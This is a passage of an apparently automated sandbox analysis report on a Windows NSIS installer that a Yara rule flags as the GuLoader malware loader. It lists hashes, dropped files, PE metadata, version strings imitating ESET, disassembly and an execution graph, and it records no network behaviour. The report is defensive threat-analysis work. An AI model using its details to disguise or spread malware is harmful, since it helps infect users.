                                              SHA-512:7EC0A371A1A765E47E9ECBB60500363F312DCBC78DAFF95B115A337F0833DE1C23ABFF4FAE8628010C1FD5FBE94EFA60D1F1A88CAE8947A79BA77BAF22CCCD7A
                                              Malicious:false
                                              Reputation:low
                                              Preview:[Exorcise]..PYROPHYLLTE=Fornrmelser..
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                              • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                              • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                              • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                              • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                              • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                              • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                              • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                              • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                              • Filename: Transferencia desde ING.exe, Detection: malicious, Browse
                                              • Filename: Transferencia desde ING.exe, Detection: malicious, Browse
                                              • Filename: shipping document.exe, Detection: malicious, Browse
                                              • Filename: shipping document.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.generic.ml.1686.exe, Detection: malicious, Browse
                                              • Filename: gunzipped.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):147
                                              Entropy (8bit):5.834297280344084
                                              Encrypted:false
                                              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
                                              MD5:38D787F55E22FB591135F9250CD259D4
                                              SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
                                              SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
                                              SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):6.199795193277217
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:xcVh7ZmH4Y.exe
                                              File size:306502
                                              MD5:d17d180329065df1bf54501a2c8e138b
                                              SHA1:255c70621a90d6070d2585ef47eaff05c143c54a
                                              SHA256:6a3b4d2025462d750011db9881bd74700cf7e2e7708398a18dfec422555ba438
                                              SHA512:14652b3a013749bdeb7fe454b0cf07f4aa9d064548d6ae98369b412892e7aa1a35623d2c48f18922896d7d12bf30c57d5e23e07dc955ffe0bfc9e8b737371317
                                              SSDEEP:6144:XbE/HUp8lYEkA1Jutcmjo0iHGpMrs+/llqSQZr5PoNzbC8USMxQKQ+:Xb9OYEkA1Jutcmjo0imp2s+tQSQZtPoO
                                              TLSH:6054C09637C8E6F0E5A182745C79C5AB0F2A3C3BDA70591F3FD17B0F24B1260871A929
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                              Icon Hash:7860e068e0fcf870
                                              Entrypoint:0x40352d
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 000003F4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [ebp-14h], ebx
                                              mov dword ptr [ebp-04h], 0040A2E0h
                                              mov dword ptr [ebp-10h], ebx
                                              call dword ptr [004080CCh]
                                              mov esi, dword ptr [004080D0h]
                                              lea eax, dword ptr [ebp-00000140h]
                                              push eax
                                              mov dword ptr [ebp-0000012Ch], ebx
                                              mov dword ptr [ebp-2Ch], ebx
                                              mov dword ptr [ebp-28h], ebx
                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007F51ECD46E4Ah
                                              lea eax, dword ptr [ebp-00000140h]
                                              mov dword ptr [ebp-00000140h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [ebp-0000012Ch]
                                              mov ecx, dword ptr [ebp-00000112h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [ebp-26h], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [ebp-2Ch], ax
                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                              jnc 00007F51ECD46E1Ah
                                              and word ptr [ebp-00000132h], 0000h
                                              mov eax, dword ptr [ebp-00000134h]
                                              movzx ecx, byte ptr [ebp-00000138h]
                                              mov dword ptr [00434FB8h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [ebp-0000013Ch]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [ebp-2Ch]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x28500.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x360000x2e0000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x640000x285000x28600False0.275118517802data4.14455193293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x643580x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                              RT_ICON0x74b800x94a8dataEnglishUnited States
                                              RT_ICON0x7e0280x5488dataEnglishUnited States
                                              RT_ICON0x834b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65535, next used block 4294909696EnglishUnited States
                                              RT_ICON0x876d80x25a8dataEnglishUnited States
                                              RT_ICON0x89c800x10a8dataEnglishUnited States
                                              RT_ICON0x8ad280x988dataEnglishUnited States
                                              RT_ICON0x8b6b00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                              RT_DIALOG0x8bb180x120dataEnglishUnited States
                                              RT_DIALOG0x8bc380x11cdataEnglishUnited States
                                              RT_DIALOG0x8bd580xc4dataEnglishUnited States
                                              RT_DIALOG0x8be200x60dataEnglishUnited States
                                              RT_GROUP_ICON0x8be800x76dataEnglishUnited States
                                              RT_VERSION0x8bef80x2c8dataEnglishUnited States
                                              RT_MANIFEST0x8c1c00x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                              DLLImport
                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                              DescriptionData
                                              LegalCopyrightMediatronic Pty Ltd
                                              FileVersion4.31.18
                                              CompanyNameMolex Incorporated
                                              LegalTrademarksHousehold International Corp.
                                              CommentsVolt Information Sciences Inc
                                              ProductNameESET
                                              FileDescriptionSprint Corp.
                                              Translation0x0409 0x04b0
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              No network behavior found

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:0
                                              Start time:22:00:42
                                              Start date:10/05/2022
                                              Path:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
                                              Imagebase:0x400000
                                              File size:306502 bytes
                                              MD5 hash:D17D180329065DF1BF54501A2C8E138B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.896769853.0000000002D00000.00000040.00000001.00040000.00000007.sdmp, Author: Joe Security
                                              Reputation:low

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:20.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:16.1%
                                                Total number of Nodes:1557
                                                Total number of Limit Nodes:34
                                                execution_graph 3940 401941 3941 401943 3940->3941 3946 402da6 3941->3946 3947 402db2 3946->3947 3991 40657a 3947->3991 3950 401948 3952 405c49 3950->3952 4033 405f14 3952->4033 3955 405c71 DeleteFileW 3957 401951 3955->3957 3956 405c88 3958 405da8 3956->3958 4047 40653d lstrcpynW 3956->4047 3958->3957 4076 406873 FindFirstFileW 3958->4076 3960 405cae 3961 405cc1 3960->3961 3962 405cb4 lstrcatW 3960->3962 4048 405e58 lstrlenW 3961->4048 3963 405cc7 3962->3963 3967 405cd7 lstrcatW 3963->3967 3969 405ce2 lstrlenW FindFirstFileW 3963->3969 3967->3969 3968 405dd1 4079 405e0c lstrlenW CharPrevW 3968->4079 3969->3958 3976 405d04 3969->3976 3972 405d8b FindNextFileW 3972->3976 3977 405da1 FindClose 3972->3977 3973 405c01 5 API calls 3975 405de3 3973->3975 3978 405de7 3975->3978 3979 405dfd 3975->3979 3976->3972 3987 405d4c 3976->3987 4052 40653d lstrcpynW 3976->4052 3977->3958 3978->3957 3982 40559f 24 API calls 3978->3982 3981 40559f 24 API calls 3979->3981 3981->3957 3984 405df4 3982->3984 3983 405c49 60 API calls 3983->3987 3986 4062fd 36 API calls 3984->3986 3985 40559f 24 API calls 3985->3972 3989 405dfb 3986->3989 3987->3972 3987->3983 3987->3985 4053 405c01 3987->4053 4061 40559f 3987->4061 4072 4062fd MoveFileExW 3987->4072 3989->3957 3995 406587 3991->3995 3992 4067aa 3993 402dd3 3992->3993 4024 40653d lstrcpynW 3992->4024 3993->3950 4008 4067c4 3993->4008 3995->3992 3996 406778 lstrlenW 3995->3996 3997 40668f GetSystemDirectoryW 3995->3997 4001 40657a 10 API calls 3995->4001 4002 4066a2 GetWindowsDirectoryW 3995->4002 4003 4067c4 5 API calls 3995->4003 4004 4066d1 SHGetSpecialFolderLocation 3995->4004 4005 406719 lstrcatW 3995->4005 4006 40657a 10 API calls 3995->4006 4017 40640b 3995->4017 4022 406484 wsprintfW 3995->4022 4023 40653d lstrcpynW 3995->4023 3996->3995 3997->3995 4001->3996 4002->3995 4003->3995 4004->3995 4007 4066e9 SHGetPathFromIDListW CoTaskMemFree 4004->4007 4005->3995 4006->3995 4007->3995 4015 4067d1 4008->4015 4009 406847 4010 40684c CharPrevW 4009->4010 4012 40686d 4009->4012 4010->4009 4011 40683a CharNextW 4011->4009 4011->4015 4012->3950 4014 406826 CharNextW 4014->4015 4015->4009 4015->4011 4015->4014 4016 406835 CharNextW 4015->4016 4029 405e39 4015->4029 4016->4011 4025 4063aa 4017->4025 4020 40646f 4020->3995 4021 40643f RegQueryValueExW RegCloseKey 4021->4020 4022->3995 4023->3995 4024->3993 4026 4063b9 4025->4026 4027 4063c2 RegOpenKeyExW 4026->4027 4028 4063bd 4026->4028 4027->4028 4028->4020 4028->4021 4030 405e3f 4029->4030 4031 405e55 4030->4031 4032 405e46 CharNextW 4030->4032 4031->4015 4032->4030 4082 40653d lstrcpynW 4033->4082 4035 405f25 4083 405eb7 CharNextW CharNextW 4035->4083 4038 405c69 4038->3955 4038->3956 4039 4067c4 5 API calls 4044 405f3b 4039->4044 4040 405f6c lstrlenW 4041 405f77 4040->4041 4040->4044 4042 405e0c 3 API calls 4041->4042 4045 405f7c GetFileAttributesW 4042->4045 4043 406873 2 API calls 4043->4044 4044->4038 4044->4040 4044->4043 4046 405e58 2 API calls 4044->4046 4045->4038 4046->4040 4047->3960 4049 405e66 4048->4049 4050 405e78 4049->4050 4051 405e6c CharPrevW 4049->4051 4050->3963 4051->4049 4051->4050 4052->3976 4089 406008 GetFileAttributesW 4053->4089 4056 405c2e 4056->3987 4057 405c24 DeleteFileW 4059 405c2a 4057->4059 4058 405c1c RemoveDirectoryW 4058->4059 4059->4056 4060 405c3a SetFileAttributesW 4059->4060 4060->4056 4062 4055ba 4061->4062 4071 40565c 4061->4071 4063 4055d6 lstrlenW 4062->4063 4064 40657a 17 API calls 4062->4064 4065 4055e4 lstrlenW 4063->4065 4066 4055ff 4063->4066 4064->4063 4069 4055f6 lstrcatW 4065->4069 4065->4071 4067 405612 4066->4067 4068 405605 SetWindowTextW 4066->4068 4070 405618 SendMessageW SendMessageW SendMessageW 4067->4070 4067->4071 4068->4067 4069->4066 4070->4071 4071->3987 4073 40631e 4072->4073 4074 406311 4072->4074 4073->3987 4092 406183 4074->4092 4077 405dcd 4076->4077 4078 406889 FindClose 4076->4078 4077->3957 4077->3968 4078->4077 4080 405dd7 4079->4080 4081 405e28 lstrcatW 4079->4081 4080->3973 4081->4080 4082->4035 4084 405ed4 4083->4084 4088 405ee6 4083->4088 4086 405ee1 CharNextW 4084->4086 4084->4088 4085 405f0a 4085->4038 4085->4039 4086->4085 4087 405e39 CharNextW 4087->4088 4088->4085 4088->4087 4090 405c0d 4089->4090 4091 40601a SetFileAttributesW 4089->4091 4090->4056 4090->4057 4090->4058 4091->4090 4093 4061b3 4092->4093 4094 4061d9 GetShortPathNameW 4092->4094 4119 40602d GetFileAttributesW CreateFileW 4093->4119 4095 4062f8 4094->4095 4096 4061ee 4094->4096 4095->4073 4096->4095 4098 4061f6 wsprintfA 4096->4098 4101 40657a 17 API calls 4098->4101 4099 4061bd CloseHandle GetShortPathNameW 4099->4095 4100 4061d1 4099->4100 4100->4094 4100->4095 4102 40621e 4101->4102 4120 40602d GetFileAttributesW CreateFileW 4102->4120 4104 40622b 4104->4095 4105 40623a GetFileSize GlobalAlloc 4104->4105 4106 4062f1 CloseHandle 4105->4106 4107 40625c 4105->4107 4106->4095 4121 4060b0 ReadFile 4107->4121 4112 40627b lstrcpyA 4114 40629d 4112->4114 4113 40628f 4115 405f92 4 API calls 4113->4115 4116 4062d4 SetFilePointer 4114->4116 4115->4114 4128 4060df WriteFile 4116->4128 4119->4099 4120->4104 4122 4060ce 4121->4122 4122->4106 4123 405f92 lstrlenA 4122->4123 4124 405fd3 lstrlenA 4123->4124 4125 405fdb 4124->4125 4126 405fac lstrcmpiA 4124->4126 4125->4112 4125->4113 4126->4125 4127 405fca CharNextA 4126->4127 4127->4124 4129 4060fd GlobalFree 4128->4129 4129->4106 4130 4015c1 4131 402da6 17 API calls 4130->4131 4132 4015c8 4131->4132 4133 405eb7 4 API calls 4132->4133 4138 4015d1 4133->4138 4134 401631 4136 401663 4134->4136 4137 401636 4134->4137 4135 405e39 CharNextW 4135->4138 4141 401423 24 API calls 4136->4141 4157 401423 4137->4157 4138->4134 4138->4135 4147 401617 GetFileAttributesW 4138->4147 4149 405b08 4138->4149 4152 405a6e CreateDirectoryW 4138->4152 4161 405aeb CreateDirectoryW 4138->4161 4144 40165b 4141->4144 4146 40164a SetCurrentDirectoryW 4146->4144 4147->4138 4164 40690a GetModuleHandleA 4149->4164 4153 405abb 4152->4153 4154 405abf GetLastError 4152->4154 4153->4138 4154->4153 4155 405ace SetFileSecurityW 4154->4155 4155->4153 4156 405ae4 GetLastError 4155->4156 4156->4153 4158 40559f 24 API calls 4157->4158 4159 401431 4158->4159 4160 40653d lstrcpynW 4159->4160 4160->4146 4162 405afb 4161->4162 4163 405aff GetLastError 4161->4163 4162->4138 4163->4162 4165 406930 GetProcAddress 4164->4165 4166 406926 4164->4166 4168 405b0f 4165->4168 4170 40689a GetSystemDirectoryW 4166->4170 4168->4138 4169 40692c 4169->4165 4169->4168 4171 4068bc wsprintfW LoadLibraryExW 4170->4171 4171->4169 4948 401c43 4949 402d84 17 API calls 4948->4949 4950 401c4a 4949->4950 4951 402d84 17 API calls 4950->4951 4952 401c57 4951->4952 4953 401c6c 4952->4953 4954 402da6 17 API calls 4952->4954 4955 401c7c 4953->4955 4956 402da6 17 API calls 4953->4956 4954->4953 4957 401cd3 4955->4957 4958 401c87 4955->4958 4956->4955 4959 402da6 17 API calls 4957->4959 4960 402d84 17 API calls 4958->4960 4961 401cd8 4959->4961 4962 401c8c 4960->4962 4963 402da6 17 API calls 4961->4963 4964 402d84 17 API calls 4962->4964 4966 401ce1 FindWindowExW 4963->4966 4965 401c98 4964->4965 4967 401cc3 SendMessageW 4965->4967 4968 401ca5 SendMessageTimeoutW 4965->4968 4969 401d03 4966->4969 4967->4969 4968->4969 4970 404943 4971 404953 4970->4971 4972 404979 4970->4972 4973 404499 18 API calls 4971->4973 4974 404500 8 API calls 4972->4974 4975 404960 SetDlgItemTextW 4973->4975 4976 404985 4974->4976 4975->4972 4977 4028c4 4978 4028ca 4977->4978 4979 4028d2 FindClose 4978->4979 4980 402c2a 4978->4980 4979->4980 4984 4016cc 4985 402da6 17 API calls 4984->4985 4986 4016d2 GetFullPathNameW 4985->4986 4989 4016ec 4986->4989 4993 40170e 4986->4993 4987 401723 GetShortPathNameW 4988 402c2a 4987->4988 4990 406873 2 API calls 4989->4990 4989->4993 4991 4016fe 4990->4991 4991->4993 4994 40653d lstrcpynW 4991->4994 4993->4987 4993->4988 4994->4993 4995 73541058 4997 73541074 4995->4997 4996 735410dd 4997->4996 4998 73541092 4997->4998 5008 735415b6 4997->5008 5000 735415b6 GlobalFree 4998->5000 5001 735410a2 5000->5001 5002 735410b2 5001->5002 5003 735410a9 GlobalSize 5001->5003 5004 735410b6 GlobalAlloc 5002->5004 5005 735410c7 5002->5005 5003->5002 5006 735415dd 3 API calls 5004->5006 5007 735410d2 GlobalFree 5005->5007 5006->5005 5007->4996 5009 735415bc 5008->5009 5010 735415c2 5009->5010 5011 735415ce GlobalFree 5009->5011 5010->4998 5011->4998 5012 401e4e GetDC 5013 402d84 17 API calls 5012->5013 5014 401e60 GetDeviceCaps MulDiv ReleaseDC 5013->5014 5015 402d84 17 API calls 5014->5015 5016 401e91 5015->5016 5017 40657a 17 API calls 5016->5017 5018 401ece CreateFontIndirectW 5017->5018 5019 402638 5018->5019 5020 4045cf lstrcpynW lstrlenW 5021 402950 5022 402da6 17 API calls 5021->5022 5023 40295c 5022->5023 5024 402972 5023->5024 5025 402da6 17 API calls 5023->5025 5026 406008 2 API calls 5024->5026 5025->5024 5027 402978 5026->5027 5049 40602d GetFileAttributesW CreateFileW 5027->5049 5029 402985 5030 402a3b 5029->5030 5031 4029a0 GlobalAlloc 5029->5031 5032 402a23 5029->5032 5033 402a42 DeleteFileW 5030->5033 5034 402a55 5030->5034 5031->5032 5035 4029b9 5031->5035 5036 4032b4 31 API calls 5032->5036 5033->5034 5050 4034e5 SetFilePointer 5035->5050 5038 402a30 CloseHandle 5036->5038 5038->5030 5039 4029bf 5040 4034cf ReadFile 5039->5040 5041 4029c8 GlobalAlloc 5040->5041 5042 4029d8 5041->5042 5043 402a0c 5041->5043 5044 4032b4 31 API calls 5042->5044 5045 4060df WriteFile 5043->5045 5048 4029e5 5044->5048 5046 402a18 GlobalFree 5045->5046 5046->5032 5047 402a03 GlobalFree 5047->5043 5048->5047 5049->5029 5050->5039 5051 401956 5052 402da6 17 API calls 5051->5052 5053 40195d lstrlenW 5052->5053 5054 402638 5053->5054 4568 4014d7 4569 402d84 17 API calls 4568->4569 4570 4014dd Sleep 4569->4570 4572 402c2a 4570->4572 5055 73542d43 5056 73542d5b 5055->5056 5057 7354162f 2 API calls 5056->5057 5058 73542d76 5057->5058 4573 4020d8 4574 40219c 4573->4574 4575 4020ea 4573->4575 4577 401423 24 API calls 4574->4577 4576 402da6 17 API calls 4575->4576 4578 4020f1 4576->4578 4584 4022f6 4577->4584 4579 402da6 17 API calls 4578->4579 4580 4020fa 4579->4580 4581 402110 LoadLibraryExW 4580->4581 4582 402102 GetModuleHandleW 4580->4582 4581->4574 4583 402121 4581->4583 4582->4581 4582->4583 4597 406979 4583->4597 4587 402132 4589 402151 4587->4589 4590 40213a 4587->4590 4588 40216b 4591 40559f 24 API calls 4588->4591 4602 73541817 4589->4602 4642 735412bb GlobalAlloc 4589->4642 4593 401423 24 API calls 4590->4593 4592 402142 4591->4592 4592->4584 4594 40218e FreeLibrary 4592->4594 4593->4592 4594->4584 4643 40655f WideCharToMultiByte 4597->4643 4599 406996 4600 40699d GetProcAddress 4599->4600 4601 40212c 4599->4601 4600->4601 4601->4587 4601->4588 4603 7354184a 4602->4603 4644 73541bff 4603->4644 4605 73541851 4606 73541976 4605->4606 4607 73541862 4605->4607 4608 73541869 4605->4608 4606->4592 4685 7354243e 4607->4685 4675 73542480 4608->4675 4613 735418cd 4617 735418d3 4613->4617 4618 7354191e 4613->4618 4614 735418af 4698 73542655 4614->4698 4615 7354187f 4620 73541885 4615->4620 4625 73541890 4615->4625 4616 73541898 4616->4620 4695 73542e23 4616->4695 4717 73541666 4617->4717 4623 73542655 10 API calls 4618->4623 4620->4613 4620->4614 4628 7354190f 4623->4628 4624 735418b5 4709 73541654 4624->4709 4689 73542810 4625->4689 4634 73541965 4628->4634 4723 73542618 4628->4723 4631 73541896 4631->4620 4632 73542655 10 API calls 4632->4628 4634->4606 4636 7354196f GlobalFree 4634->4636 4636->4606 4639 73541951 4639->4634 4727 735415dd wsprintfW 4639->4727 4640 7354194a FreeLibrary 4640->4639 4642->4592 4643->4599 4730 735412bb GlobalAlloc 4644->4730 4646 73541c26 4731 735412bb GlobalAlloc 4646->4731 4648 73541e6b GlobalFree GlobalFree GlobalFree 4649 73541e88 4648->4649 4666 73541ed2 4648->4666 4651 7354227e 4649->4651 4657 73541e9d 4649->4657 4649->4666 4650 73541d26 GlobalAlloc 4662 73541c31 4650->4662 4652 735422a0 GetModuleHandleW 4651->4652 4651->4666 4655 735422c6 4652->4655 4656 735422b1 LoadLibraryW 4652->4656 4653 73541d71 lstrcpyW 4659 73541d7b lstrcpyW 4653->4659 4654 73541d8f GlobalFree 4654->4662 4738 735416bd WideCharToMultiByte GlobalAlloc 